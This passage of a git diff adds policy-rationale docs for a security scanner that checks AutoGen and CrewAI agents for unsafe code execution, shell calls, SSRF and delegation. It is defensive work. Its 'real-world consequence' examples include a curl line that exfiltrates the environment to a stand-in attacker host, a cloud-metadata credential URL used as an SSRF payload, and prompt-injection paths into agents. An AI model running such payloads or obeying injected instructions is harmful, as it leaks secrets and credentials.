(`use_docker=True`) and require human review + (`human_input_mode="ALWAYS"` or `"TERMINATE"`) on the executor. +3. Bound every loop: set `max_consecutive_auto_reply` on executors and + `max_round` on group chats, sized to the workflow, paired with a clear + termination condition so the chat ends on success. +4. If unattended execution is a hard requirement, run the code in a hardened + external sandbox with no host access rather than via the AutoGen executor. diff --git a/docs/Policy/autogen/code_execution.md b/docs/Policy/autogen/code_execution.md new file mode 100644 index 0000000..668f1ee --- /dev/null +++ b/docs/Policy/autogen/code_execution.md @@ -0,0 +1,123 @@ +--- +policy_id: autogen_code_execution +category: autogen +topic: code_execution +rules: + - id: AG2-010 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM05] +--- + +# Policy Rationale: AutoGen Code-Execution Safety + +**Policy ID:** `autogen_code_execution` +**File:** `autogen/code_execution.yaml` +**Rules:** AG2-010 +**Severities:** high +**Fix types:** code +**References:** LLM05 (Improper Output Handling) + +--- + +## What this policy covers + +AutoGen tool functions whose body evaluates code at runtime. **AG2-010** fires +when a tool registered with an agent (via `register_function` or the +`register_for_llm` / `register_for_execution` decorators) calls the bare `eval`, +`exec`, or `compile` builtin (predicate `has_code_exec_call`, a bare-builtin AST +match — `re.compile` and other attribute calls do not fire). + +--- + +## Why dynamic code execution is a distinct concern in AutoGen tools + +A registered AutoGen tool is exposed to the model, so the model writes or steers +any string the tool evaluates. With any model-influenced input, +`eval`/`exec`/`compile` is arbitrary code execution inside the agent process — +no OS sandbox stands between the call and the runtime's imports, file handles, +and in-memory credentials. The blast radius is the whole process: one evaluated +string can read `os.environ`, touch any file the process can reach, or spawn a +subprocess. + +The AutoGen-specific sharpening: this is the same arbitrary-execution risk +AutoGen's code *executor* carries, but reached inside an ordinary tool rather +than through the executor. AutoGen's documentation strongly recommends running +generated code inside Docker; a hand-rolled `eval`/`exec` in a tool body bypasses +that entirely — it runs in-process with none of the executor's container +isolation, and it hides inside a function that looks like any other tool. So the +mitigation AutoGen built (the Docker executor) is sidestepped exactly when a +developer reaches for `eval` for convenience. + +--- + +## Rule-by-rule defense + +### AG2-010 — Tool body evaluates dynamic code (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** an AutoGen-registered tool whose body calls the bare `eval`, +`exec`, or `compile` builtin (predicate `has_code_exec_call`, an AST callee +match, not a substring scan). + +**Why it is flaggable:** dynamic evaluation in a model-callable tool is an +arbitrary-code-execution surface whenever any part of the evaluated string +originates with the model. The presence of the primitive is the signal. + +**Real-world consequence:** a `calc(expr)` tool implemented as `return eval(expr)` +is driven by an injected instruction into `__import__('os').environ` to read +secrets, or into reading/writing files the process can touch. + +**Why severity is high and not critical:** no in-band sandbox stands between the +call and the full runtime, so the only reliable fix is removing dynamic +evaluation; it is not raised to critical because the engine reserves that tier and +the exposure depends on whether the evaluated string is actually model-influenced. +**Fix type — code:** removing `eval`/`exec`/`compile` is a tool-source edit. +**Confidence 0.85:** the bare-callee match avoids the `re.compile` false positive, +but a dynamic-eval helper in another module, or evaluation via +`types.FunctionType` / `marshal` / `pickle.loads`, escapes the body-only walk. + +--- + +## What this policy does not cover + +- AutoGen's code *executor* configuration (Docker, human review) — that is the + agent-scope concern of **AG2-001 / AG2-002** (agent_safety.md), not a tool + rule. +- Dynamic evaluation reached through a helper in another module — the walk sees + only the tool body. +- Alternative dynamic-code primitives: `types.FunctionType`, `marshal.loads`, + `pickle.loads`, `importlib`-driven loading. +- Evaluations whose argument is provably a constant literal still fire — the + predicate flags the presence of the primitive, not proof of model-control. + +--- + +## Recommendations beyond the fix + +```python +import ast +from autogen import register_function + +def safe_calc(expr: str) -> str: + """Evaluate a constant arithmetic expression; runs no arbitrary code.""" + node = ast.parse(expr, mode="eval") + allowed = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant, + ast.operator, ast.unaryop) + if not all(isinstance(n, allowed) for n in ast.walk(node)): + return "error: disallowed syntax" + return str(eval(compile(node, "", "eval"))) # literals only + +register_function(safe_calc, caller=assistant, executor=executor, + description="Evaluate a constant arithmetic expression.") +``` + +1. Remove `eval`/`exec`/`compile` from agent-callable tool bodies. For data math + prefer `ast.literal_eval`; reserve a constrained AST walk for arithmetic. +2. If running code is genuinely the product, route it through AutoGen's Docker + code executor or a locked-down external sandbox (no filesystem, no network, + hard timeout) rather than in-process evaluation. +3. Keep application secrets out of the process that hosts any evaluation-capable + tool — assume an evaluated string can read the whole environment. +4. Log every evaluation with the session ID and the model that requested it. diff --git a/docs/Policy/autogen/network.md b/docs/Policy/autogen/network.md new file mode 100644 index 0000000..3bfe290 --- /dev/null +++ b/docs/Policy/autogen/network.md @@ -0,0 +1,119 @@ +--- +policy_id: autogen_network +category: autogen +topic: network +rules: + - id: AG2-012 + severity: medium + confidence: 0.8 + scope: tool + fix_type: code +references: [LLM10] +--- + +# Policy Rationale: AutoGen Tool Network Hygiene + +**Policy ID:** `autogen_network` +**File:** `autogen/network.yaml` +**Rules:** AG2-012 +**Severities:** medium +**Fix types:** code +**References:** LLM10 (Unbounded Consumption) + +--- + +## What this policy covers + +Network-call hygiene inside AutoGen tool functions. **AG2-012** uses the +`call_without_kwarg` predicate: it fires when the tool body calls one of the +`requests.*` or `httpx.*` request functions (`get`, `post`, `put`, `delete`, +`patch`, `head`, `request`) without a `timeout=` keyword argument. A call that +already passes `timeout=` does not fire. + +--- + +## Why a missing timeout is a distinct concern in AutoGen tools + +A `requests.get(url)` with no `timeout` blocks until the remote responds or the +connection dies — which, against a slow or hostile server, can be forever. +AutoGen has no tool-level timeout to rescue it: the tool call runs inside the +agent conversation loop, so a hung request stalls the entire agent until the +socket eventually gives up. Under load this exhausts whatever runtime hosts the +agent — threads, connections, the event loop — and the failure never surfaces to +the model, so the agent simply appears to freeze. That is the Unbounded +Consumption (LLM10) failure mode: a single unresponsive endpoint ties up the +agent indefinitely with no upper bound on the wait. In a multi-agent group chat +the stall is worse: one hung tool call can block the whole conversation, not just +one turn. + +--- + +## Rule-by-rule defense + +### AG2-012 — Tool network call has no timeout (Severity: medium, Confidence: 0.8, Fix type: code) + +**What we detect:** an AutoGen tool body that calls a `requests.*` / `httpx.*` +request function with no `timeout=` keyword (predicate `call_without_kwarg`). + +**Why it is flaggable:** without a timeout the request can hang indefinitely, and +AutoGen has no tool-level timeout — the hung call blocks the agent loop until the +socket dies. + +**Real-world consequence:** a `fetch_report(url)` tool calls `requests.get(url)` +with no timeout; a slow upstream makes the agent hang for minutes per call, and +under concurrent load the host runs out of connections while every agent waits. + +**Why severity is medium and not high:** the impact is an availability/cost +incident, not a compromise — recoverable, and only triggered by a slow or +unresponsive remote rather than on every call. **Fix type — code:** adding +`timeout=` is a tool-source edit. **Confidence 0.8:** the rule looks for the +`timeout` kwarg on the recognized callees, so it over-fires when a timeout is set +another way (a session-level default, an `httpx.Client(timeout=...)` the call +inherits) and under-fires on request libraries outside the recognized +`requests`/`httpx` set (`urllib`, `aiohttp`, a custom client). + +--- + +## What this policy does not cover + +- Request libraries other than `requests` / `httpx` — `urllib.request`, + `aiohttp`, `urllib3`, or a bespoke HTTP client are not in the recognized callee + set. +- A timeout set through a mechanism other than the per-call `timeout=` kwarg — a + `requests.Session` default, an `httpx.Client(timeout=...)` the call inherits, + or a socket-level default — the rule cannot see it and fires anyway. +- Whether the chosen timeout value is *appropriate*. A call with `timeout=600` + satisfies the rule but still hangs the agent for ten minutes. +- Retries, connection-pool exhaustion, and other resource limits beyond the + single request timeout. + +--- + +## Recommendations beyond the fix + +```python +import requests +from autogen import register_function + +def fetch_report(report_id: str) -> str: + """Fetch a report by ID from the vetted host with a tight timeout.""" + resp = requests.get( + f"https://api.example.com/reports/{report_id}", + timeout=10, # fail fast on a slow remote + ) + resp.raise_for_status() + return resp.text + +register_function(fetch_report, caller=assistant, executor=executor, + description="Fetch a report by ID.") +``` + +1. Pass `timeout=` (typically 5–30 seconds) to every request, sized tight enough + to fail fast and loose enough for legitimate slow responses on that endpoint. +2. Prefer a configured client (`httpx.Client(timeout=...)`) so a default applies + even where a per-call value is forgotten — but keep an explicit per-call + timeout on slow endpoints. +3. Surface failures as a structured error the model can react to (retry, fall + back, report) rather than letting the call hang. +4. Add retry-with-backoff and a circuit breaker for endpoints the agent depends + on, so a flaky remote degrades gracefully instead of stalling the loop. diff --git a/docs/Policy/autogen/repo_hygiene.md b/docs/Policy/autogen/repo_hygiene.md new file mode 100644 index 0000000..9d95d39 --- /dev/null +++ b/docs/Policy/autogen/repo_hygiene.md @@ -0,0 +1,119 @@ +--- +policy_id: autogen_repo_hygiene +category: autogen +topic: repo_hygiene +rules: + - id: AG2-201 + severity: low + confidence: 0.9 + scope: repo + fix_type: config +references: [LLM06] +--- + +# Policy Rationale: AutoGen Repo Hygiene + +**Policy ID:** `autogen_repo_hygiene` +**File:** `autogen/repo_hygiene.yaml` +**Rules:** AG2-201 +**Severities:** low +**Fix types:** config +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +A single repo-scope rule that fires once per scan. **AG2-201** fires when the +repo uses AutoGen in code (predicate `repo_has_sdk_in_code` for `autogen`) but +ships no agent-guidance doc — neither `AGENTS.md` nor `CLAUDE.md` is present as a +discovered repo component (predicate `repo_component_present`, negated). It reads +the scan inventory, not any single file. + +--- + +## Why a missing agent-guidance doc is a distinct concern for AutoGen projects + +`AGENTS.md` is the cross-vendor convention an editing coding agent reads before it +acts on a repository. When neither it nor a `CLAUDE.md` is present, any agent that +opens this repo has no project-specific guidance on how its agents and tools must +be configured. For an AutoGen project specifically, that means nothing in-tree +tells the agent whether code execution is permitted, whether the executor must run +in Docker, whether `human_input_mode` may be set to `NEVER`, and what the local +test and build commands are. The likely consequence is generated code that +violates the project's own safety contract — an agent wiring an executor with +`use_docker=False` or `human_input_mode="NEVER"` because nothing taught it the +local rules. This is a soft, preventive form of excessive-agency risk (LLM06): +the guardrail that should constrain an editing agent's choices is absent, so the +agent operates with more latitude than the maintainers intend. + +--- + +## Rule-by-rule defense + +### AG2-201 — Project ships no agent-guidance doc (Severity: low, Confidence: 0.9, Fix type: config) + +**What we detect:** a repo that uses AutoGen in code but has neither `AGENTS.md` +nor `CLAUDE.md` at the root (predicates `repo_has_sdk_in_code` + `not +repo_component_present`). + +**Why it is flaggable:** without an in-tree guidance doc, an editing agent has no +project-specific rules to follow and will reproduce unsafe patterns the +maintainers would reject. + +**Real-world consequence:** a developer asks a coding agent to "add an executor +that runs the generated scripts"; with no `AGENTS.md` stating Docker is required, +the agent writes `code_execution_config={"use_docker": False}` — exactly the +pattern AG2-001 flags. + +**Why severity is low and not medium:** the absence of the doc causes no harm by +itself; it only raises the probability that *other* defects get introduced, so it +is a preventive nudge rather than a live vulnerability. **Fix type — config:** the +fix is adding a documentation file at the repo root — no application or tool code +changes. **Confidence 0.9:** presence of `AGENTS.md` / `CLAUDE.md` is an +unambiguous inventory check; the small gap covers projects that document agent +guidance somewhere the component scan does not recognize. + +--- + +## What this policy does not cover + +- The *content* or *quality* of an `AGENTS.md`. An empty or stale file satisfies + the rule; the rule checks presence, not whether the guidance is correct or + followed. +- Guidance kept somewhere other than a root `AGENTS.md` / `CLAUDE.md` — a wiki, a + `CONTRIBUTING.md`, or a nested per-package doc — counts as absent. +- Whether any agent actually reads the doc. The rule cannot verify that an + editing agent honors the guidance. +- It is a repo-scope nudge, not a per-agent or per-tool check — it says nothing + about the safety of any individual agent or tool in the repo. + +--- + +## Recommendations beyond the fix + +```markdown + +# Agent guidance + +## Safety rules +- Code execution must run in Docker (`use_docker=True`) and is never enabled on + an `AssistantAgent` — route it through the executor proxy only. +- `human_input_mode="NEVER"` is forbidden on any code-executing agent. +- Group chats set `max_round`; executors set `max_consecutive_auto_reply`. +- Tools must not shell out or fetch model-supplied URLs without the net guard. + +## Commands +- Test: `pytest` +- Lint: `ruff check .` +- Build: `make build` +``` + +1. Add an `AGENTS.md` at the repo root (a `CLAUDE.md` also satisfies the rule). +2. State whether code execution is permitted and under what guard (Docker, + `human_input_mode`), how tools must be registered and constrained, and any + required human-in-the-loop gates. +3. List the exact test, lint, and build commands so an editing agent can verify + its own changes. +4. Keep it short and concrete, and keep it current as the safety contract + evolves. diff --git a/docs/Policy/autogen/shell_safety.md b/docs/Policy/autogen/shell_safety.md new file mode 100644 index 0000000..2867c54 --- /dev/null +++ b/docs/Policy/autogen/shell_safety.md @@ -0,0 +1,120 @@ +--- +policy_id: autogen_shell_safety +category: autogen +topic: shell_safety +rules: + - id: AG2-009 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM05] +--- + +# Policy Rationale: AutoGen Shell-Execution Safety + +**Policy ID:** `autogen_shell_safety` +**File:** `autogen/shell_safety.yaml` +**Rules:** AG2-009 +**Severities:** high +**Fix types:** code +**References:** LLM05 (Improper Output Handling) + +--- + +## What this policy covers + +AutoGen tool function bodies that spawn an OS process. **AG2-009** uses the +structured `has_shell_call` predicate: it walks the function's AST and fires on +any call whose resolved callee is `os.system`, `os.popen`, a `subprocess.*` +member (`subprocess.run`, `.Popen`, `.call`, `.check_output`, `.check_call`, …), +or an `os.spawn*` member. Because it matches the resolved callee, a +`subprocess.run(` in a comment or docstring does not fire. + +--- + +## Why shell execution is a distinct concern in AutoGen tools + +A registered AutoGen tool is exposed to the model, and the model writes or selects +the command the tool runs. Shell execution selected by model output is the most +direct path from prompt injection to remote code execution: the subprocess +inherits the agent process's working directory, environment variables (including +API keys), filesystem credentials, and outbound network. A single injected +instruction that reaches the shell runs with the agent's full privileges. + +The AutoGen-specific angle is that AutoGen already provides a *bounded* way to run +commands — the code executor, which AutoGen's docs insist should run in Docker. A +hand-rolled `subprocess.run(cmd, shell=True)` inside a tool sidesteps that +boundary completely: it runs in-process with no container, and it hides inside an +ordinary-looking tool the executor's safety settings never touch. So the tool body +is the shell surface a reviewer must inspect, because none of AutoGen's +executor-level controls apply to it. + +--- + +## Rule-by-rule defense + +### AG2-009 — Tool body spawns a subprocess (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** an AutoGen-registered tool whose body invokes `os.system`, +`os.popen`, a `subprocess.*` function, or an `os.spawn*` function (predicate +`has_shell_call`, an AST callee walk, not a substring scan). + +**Why it is flaggable:** process spawn from a model-callable tool puts the OS +shell on the model's tool surface. The presence of the spawn is the signal; every +safeguard is bolted onto an inherently broad primitive. + +**Real-world consequence:** a `run(cmd)` tool forwarding a model string into +`subprocess.run(cmd, shell=True)` is one prompt injection from arbitrary command +execution — an injected `cmd="env"` exfiltrates the process environment, API keys +included. + +**Why severity is high and not critical:** the fix usually means removing the +spawn or rearchitecting behind a typed API; it is not raised above high because +the exposure depends on what the caller does with the spawn, and the engine +reserves critical for unconditional RCE. **Fix type — code:** replacing the spawn +(or fronting it with an allow-list) is a tool-source edit. **Confidence 0.85:** +the `subprocess.*` prefix over-fires on the rare non-spawning helper +(`subprocess.list2cmdline`), and async/`pty` spawn primitives escape the body +walk. + +--- + +## What this policy does not cover + +- `asyncio.create_subprocess_exec` / `asyncio.create_subprocess_shell`, + `pty.spawn`, `pexpect.spawn`, `multiprocessing.Process`, and the `os.exec*` + family — none are in the matched callee set. +- A spawn wrapped behind a helper defined in another module — the rule scans the + tool body only. +- Whether the spawned command is safe. A literal `subprocess.run(["ls", "/tmp"], + shell=False)` fires even though it is comparatively benign. +- AutoGen's own code executor and its Docker configuration — that is an + agent-scope concern (AG2-001), not a tool rule. + +--- + +## Recommendations beyond the fix + +```python +import shutil +from autogen import register_function + +def disk_usage(path: str) -> str: + """Return free/used disk space for the volume containing `path`.""" + u = shutil.disk_usage(path) + return f"total={u.total} used={u.used} free={u.free}" + +register_function(disk_usage, caller=assistant, executor=executor, + description="Report disk usage for a path.") +``` + +1. Replace shell-outs with a typed library call wherever one exists + (`shutil`, `pathlib`, an SDK client). +2. If a subprocess is genuinely unavoidable, build the argv list explicitly and + pass `shell=False`; never interpolate model strings into a `shell=True` + command. Allow-list the exact commands permitted. +3. Always pass `timeout=` — a model can request an infinitely-running command. +4. Run the agent in a sandbox with dropped capabilities and a network egress + allow-list; drop sensitive env vars from the subprocess. Keep shell logic out + of any agent-callable tool and log every spawned command for audit. diff --git a/docs/Policy/autogen/ssrf.md b/docs/Policy/autogen/ssrf.md new file mode 100644 index 0000000..afe2f68 --- /dev/null +++ b/docs/Policy/autogen/ssrf.md @@ -0,0 +1,128 @@ +--- +policy_id: autogen_ssrf +category: autogen +topic: ssrf +rules: + - id: AG2-011 + severity: high + confidence: 0.8 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: AutoGen SSRF Safety + +**Policy ID:** `autogen_ssrf` +**File:** `autogen/ssrf.yaml` +**Rules:** AG2-011 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +AutoGen tool function bodies that issue an outbound HTTP request to a non-literal +URL. **AG2-011** uses the `has_dynamic_url_call` predicate: a request call +(`requests.*`, `httpx.*`, `urllib`, an aiohttp session, …) whose URL argument is +built from a parameter, an f-string, or a concatenation rather than a fixed +string literal. A request to a hard-coded constant URL does not fire. + +--- + +## Why SSRF is a distinct concern in AutoGen tools + +When the request URL is a literal, the developer chose the destination. When it +is built from a tool argument, the *model* chooses the destination at call time — +and in an AutoGen agent the model's choices are reachable by prompt injection. A +server-side request originates from inside the agent's network, so it can reach +things an external caller cannot: internal services on private CIDRs, localhost +admin ports, and the cloud metadata endpoint (169.254.169.254) that hands out +short-lived IAM credentials. A single injected instruction that redirects the +fetch to the metadata endpoint exfiltrates those credentials through the model's +next output. + +There is a second-order hazard specific to agents: whatever the tool fetches +re-enters the conversation as text the model reads, so an attacker who controls +the fetched page controls a fresh prompt-injection channel into the agent. The +SSRF primitive is therefore both an outbound credential-theft path and an inbound +injection path at once — excessive agency (LLM06) even when the developer never +intended the tool to reach internal hosts. + +--- + +## Rule-by-rule defense + +### AG2-011 — Tool fetches a caller-controlled URL (Severity: high, Confidence: 0.8, Fix type: code) + +**What we detect:** an AutoGen tool body that issues an HTTP request whose URL is +non-literal — built from a parameter or interpolated value (predicate +`has_dynamic_url_call`). + +**Why it is flaggable:** a model-controlled request target lets a prompt injection +point the request at internal services or the metadata endpoint, and feeds the +response back into the conversation as untrusted text. + +**Real-world consequence:** a `fetch(url)` tool calling `requests.get(url)` is +injected with `url="http://169.254.169.254/latest/meta-data/iam/security-credentials/role"`; +the returned credentials are exfiltrated through the model's next reply. + +**Why severity is high and not critical:** SSRF is serious but its blast radius +depends on the host's network position (a host with no reachable internal +services or metadata endpoint gets far less); it is not the unconditional code +execution the engine reserves critical for. **Fix type — code:** constraining or +hard-coding the destination is an edit to the tool body. **Confidence 0.8:** the +predicate flags a non-literal URL, so it over-fires when the dynamic part is +already validated against an allow-list inside the body (the rule cannot see the +guard), and under-fires when the URL is assembled in a helper in another module. + +--- + +## What this policy does not cover + +- A request whose URL is dynamic but already validated against an allow-list + inside the tool body — the rule cannot see the guard, so it fires anyway (a + known false positive). +- A fetch assembled in a helper in another module — the body-only walk misses it. +- DNS-rebinding and time-of-check/time-of-use attacks against an allow-list that + validates the hostname but not the resolved IP. Defeating those requires + re-checking the resolved address. +- Exfiltration or internal access through non-HTTP primitives (raw sockets, DNS, + SMTP) belongs to other concerns. +- Missing-timeout on the same request is a separate reliability rule + (**AG2-012**, network.md). + +--- + +## Recommendations beyond the fix + +```python +import ipaddress, socket +from urllib.parse import urlparse +import requests + +ALLOWED_HOSTS = {"api.example.com"} + +def get_status(path: str) -> str: + """Fetch a status path from the vetted API host only.""" + url = f"https://api.example.com/{path.lstrip('/')}" # host is fixed + host = urlparse(url).hostname + if host not in ALLOWED_HOSTS: + return "error: host not allowed" + ip = ipaddress.ip_address(socket.gethostbyname(host)) + if ip.is_private or ip.is_loopback or ip.is_link_local: + return "error: resolves to a non-public address" + return requests.get(url, timeout=10).text +``` + +1. If the tool only ever talks to one service, hard-code the base URL and accept + only a path or query from the model — never a full URL. +2. When a host must be dynamic, validate it against an allow-list, resolve the + hostname, and re-check the resolved IP against private / loopback / link-local + ranges to defeat DNS rebinding. +3. Disable or constrain redirect following so a 302 cannot bounce the request + into an internal address, and always pass `timeout=`. +4. Treat the fetched body as untrusted — keep it out of the system prompt and do + not let it expand the agent's permissions. diff --git a/docs/Policy/autogen/tool_definition.md b/docs/Policy/autogen/tool_definition.md new file mode 100644 index 0000000..a85df60 --- /dev/null +++ b/docs/Policy/autogen/tool_definition.md @@ -0,0 +1,149 @@ +--- +policy_id: autogen_tool_definition +category: autogen +topic: tool_definition +rules: + - id: AG2-007 + severity: low + confidence: 0.9 + scope: tool + fix_type: code + - id: AG2-008 + severity: medium + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: AutoGen Tool Definition Hygiene + +**Policy ID:** `autogen_tool_definition` +**File:** `autogen/tool_definition.yaml` +**Rules:** AG2-007, AG2-008 +**Severities:** low, medium +**Fix types:** code, code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Authoring hygiene for AutoGen tools registered via `register_function` or the +`register_for_llm` / `register_for_execution` decorators. **AG2-007** fires when +the registered function has no docstring (predicate `has_docstring: false`). +**AG2-008** fires when the function takes parameters but none carry type +annotations (predicates `has_params: true` AND `has_typed_params: false`). +AutoGen turns the function's docstring into the tool's description and its type +hints into the argument schema the model sees. + +--- + +## Why definition quality is a distinct concern in AutoGen tools + +The model never sees an AutoGen tool's implementation — only the description and +argument schema AutoGen derives from the registered function. It selects which +tool to call and what arguments to pass from that derived surface. A tool with +neither a docstring nor an explicit `description=` reaches the model as a bare +name: it cannot tell what the tool does or when to call it, so it skips the tool +or invokes it with the wrong arguments. A tool with untyped parameters produces +an underspecified schema: the model gets no type guidance, emits arguments of the +wrong shape, and the SDK rejects them at validation time — a silent reliability +tax on every call. There is an excessive-agency edge too (LLM06): an +underspecified schema widens the tool's input surface, so wrong-shaped +model-supplied values that slip past validation reach the registered function the +author never anticipated. The gap is not a remote-execution hole but a +degradation of the contract the model routes against, and it compounds across a +multi-agent conversation that burns turns re-issuing mis-shaped calls. + +--- + +## Rule-by-rule defense + +### AG2-007 — Tool has no description (Severity: low, Confidence: 0.9, Fix type: code) + +**What we detect:** a registered tool function with no docstring (predicate +`has_docstring`). + +**Why it is flaggable:** AutoGen derives the tool's description from the +docstring (unless an explicit `description=` is passed at registration); with +neither, the tool is a bare name the model cannot reason about. + +**Real-world consequence:** a `lookup` tool with no docstring is never selected +when the user asks a question it could answer, or is called with a nonsense +argument because the model is guessing at its purpose. + +**Why severity is low and not medium:** it is a routing-quality defect with no +direct security impact, and the failure mode (a skipped or mis-called tool) is +visible and recoverable. **Fix type — code:** adding a docstring (or a +`description=`) is an authoring change to the tool. **Confidence 0.9:** docstring +presence is unambiguous; the small gap is that a tool registered with an explicit +`description=` but no docstring may still be flagged by the docstring-only +predicate — a possible false positive the number accounts for. + +### AG2-008 — Tool parameters are not type-annotated (Severity: medium, Confidence: 0.85, Fix type: code) + +**What we detect:** a registered tool function that has parameters but no type +annotations on any of them (predicates `has_params` + `not has_typed_params`). + +**Why it is flaggable:** AutoGen builds the argument schema from the type hints; +without them the model gets no shape guidance and emits wrongly-typed arguments +that fail validation. + +**Real-world consequence:** a `book_meeting(start, attendees)` tool with untyped +params lets the model pass `start="next tuesdayish"`; the SDK rejects it, the call +retries, and turns are wasted before it succeeds — or it silently coerces to the +wrong value. + +**Why severity is medium and not low:** unlike a missing description, a +mis-shaped argument can reach the executor with the wrong value and cause an +incorrect action, not just a skipped call — so the impact exceeds AG2-007. **Fix +type — code:** annotating parameters is a source edit. **Confidence 0.85:** the +rule fires only when *no* parameter is typed, so a partially-typed tool is a false +negative, and `typing.Annotated` descriptions count as types so they correctly +suppress. + +--- + +## What this policy does not cover + +- A tool registered with an explicit `description=` argument satisfies the *intent* + of AG2-007, but the docstring-only predicate may still fire — verify the + description is set rather than only adding a docstring. +- A *partially* typed tool (some parameters annotated, some not) does not fire — + AG2-008 requires that no parameter carries a type. +- The *quality* of a docstring or a type: a one-word docstring or a bare `dict` + annotation satisfies the rules but barely helps the model. +- Whether the schema the model sees actually matches the tool's real behavior — a + misleading-but-present docstring passes. + +--- + +## Recommendations beyond the fix + +```python +from typing import Annotated +from autogen import register_function + +def book_meeting( + start_iso: Annotated[str, "Start time, ISO 8601, e.g. 2026-01-02T15:00:00Z"], + attendees: Annotated[list[str], "Attendee email addresses"], +) -> str: + """Book a meeting and return the calendar event ID.""" + ... + +register_function( + book_meeting, caller=assistant, executor=executor, + description="Book a meeting at a given time with a list of attendees.", +) +``` + +1. Give every tool a docstring written for the model — or pass an explicit + `description=` at registration — stating what it does, its inputs, and its + return value. +2. Annotate every parameter with a concrete type; `typing.Annotated[T, "desc"]` + adds a per-parameter description AutoGen forwards to the model. +3. Use an `Enum` or `Literal` for closed-set arguments so the model cannot emit + an out-of-range value. +4. Keep the description and the implementation in sync — an overstated docstring + is its own correctness hazard. diff --git a/docs/Policy/crewai/agent_safety.md b/docs/Policy/crewai/agent_safety.md new file mode 100644 index 0000000..b83c996 --- /dev/null +++ b/docs/Policy/crewai/agent_safety.md @@ -0,0 +1,190 @@ +--- +policy_id: crewai_agent_safety +category: crewai +topic: agent_safety +rules: + - id: CREW-101 + severity: high + confidence: 0.9 + scope: agent + fix_type: config + - id: CREW-102 + severity: high + confidence: 0.9 + scope: agent + fix_type: config + - id: CREW-104 + severity: medium + confidence: 0.75 + scope: agent + fix_type: config +references: [LLM05, LLM06] +--- + +# Policy Rationale: CrewAI Agent Safety + +**Policy ID:** `crewai_agent_safety` +**File:** `crewai/agent_safety.yaml` +**Rules:** CREW-101, CREW-102, CREW-104 +**Severities:** high, high, medium +**Fix types:** config, config, config +**References:** LLM05 (Improper Output Handling), LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Agent-scope rules for the CrewAI `Agent(...)` constructor (normalized class +`crewai_agent`). They read three constructor kwargs that hand the model +execution or delegation reach: `allow_code_execution=True` (CREW-101), +`code_execution_mode="unsafe"` (CREW-102), and `allow_delegation=True` +(CREW-104). Each is matched by the `agent_kwarg_value` predicate against the +literal value in the constructor call, so the rule fires on the declaration +itself, not on any downstream use. + +--- + +## Why agent configuration is a distinct concern in CrewAI + +CrewAI's `Agent` constructor is where capability is granted, and two of its +kwargs grant the single most dangerous capability — running model-generated +code. `allow_code_execution=True` makes CrewAI auto-inject a +`CodeInterpreterTool` into the agent's tool set; from that point the model can +run arbitrary Python it generates. Because the agent's instructions, the tool +outputs it consumes, and any content it retrieves are all model-reachable, a +single prompt injection has a direct path from text to code execution. This is +not a hypothetical: it is the entry point of CrewAI's published RCE chain — +CVE-2026-2275 escapes the SandboxPython interpreter via a `ctypes` call, and +CVE-2026-2287 silently falls back from the Docker sandbox to host execution +when Docker is unavailable. `code_execution_mode="unsafe"` is worse still: it +removes the container boundary entirely and runs model code directly on the +host, so there is nothing left to escape. + +Delegation (CREW-104) is a different shape of the same excessive-agency +problem. An agent with `allow_delegation=True` can hand work to any peer in the +crew and invoke that peer's tools, so its effective trust boundary becomes the +union of every reachable peer's capabilities — with no per-delegation gate. +This is a textbook confused-deputy setup: if any peer holds the code +interpreter or an unconstrained file reader, a prompt injection against this +agent can reach that capability indirectly, even though this agent was never +granted it directly. In an agent crew the attacker does not need to compromise +the powerful agent; it only needs to compromise one that can delegate to it. + +--- + +## Rule-by-rule defense + +### CREW-101 — Agent enables built-in code execution (Severity: high, Confidence: 0.9, Fix type: config) + +**What we detect:** an `Agent(...)` call with `allow_code_execution=True` +(predicate `agent_kwarg_value`). + +**Why it is flaggable:** the flag makes CrewAI inject a `CodeInterpreterTool`, +putting model-generated Python on the agent's tool surface. The capability is +the defect — every safeguard is bolted onto an interpreter the model can drive. +This flag is the documented entry point of CVE-2026-2275 / CVE-2026-2287, and it +is deprecated upstream. + +**Real-world consequence:** an agent built to "summarize a report" is given +`allow_code_execution=True`; a crafted instruction in the report makes it run +`__import__('os').system('curl attacker/$(env | base64)')`, exfiltrating the +process environment. + +**Why severity is high and not critical:** the engine reserves critical for +unconditional RCE; here execution still passes through CrewAI's sandbox in the +default `safe` mode, so a successful attack requires a sandbox escape or a +Docker-unavailable fallback rather than landing on the host unconditionally. +**Fix type — config:** the fix is deleting a constructor kwarg, no tool source +changes. **Confidence 0.9:** the literal-value match is unambiguous; the small +gap covers an agent that sets the flag but is provably never reachable by +untrusted input, which the constructor match cannot see. + +### CREW-102 — Agent runs code execution in unsafe mode (Severity: high, Confidence: 0.9, Fix type: config) + +**What we detect:** an `Agent(...)` call with `code_execution_mode="unsafe"` +(predicate `agent_kwarg_value`). + +**Why it is flaggable:** `unsafe` tells CrewAI to run model-generated code +directly on the host instead of inside the Docker sandbox. There is no boundary +left to escape, so a single injection yields code execution with the agent +process's privileges — strictly worse than the default `safe` mode. + +**Real-world consequence:** the same summarizer agent, now in `unsafe` mode, +runs the injected command on the host directly — no container, immediate +compromise of whatever the service account can reach. + +**Why severity is high and not critical:** the rule still requires that code +execution be wired and reachable by model-influenced input; it is high for the +same calibration reason as CREW-101, kept off critical because the engine +reserves that tier and because an agent may be exercised only on trusted, +non-injectable input. **Fix type — config:** delete the kwarg (the default +`safe` keeps execution in Docker). **Confidence 0.9:** unambiguous literal +match. + +### CREW-104 — Agent allows delegation to peer agents (Severity: medium, Confidence: 0.75, Fix type: config) + +**What we detect:** an `Agent(...)` call with `allow_delegation=True` +(predicate `agent_kwarg_value`). + +**Why it is flaggable:** delegation widens the agent's effective capability set +to that of every peer it can reach, with no per-delegation gate — a +confused-deputy path to any high-risk tool held by a peer. + +**Real-world consequence:** a low-privilege "researcher" agent with +`allow_delegation=True` is prompt-injected to delegate to a "coder" peer that +holds the code interpreter, reaching execution it was never granted. + +**Why 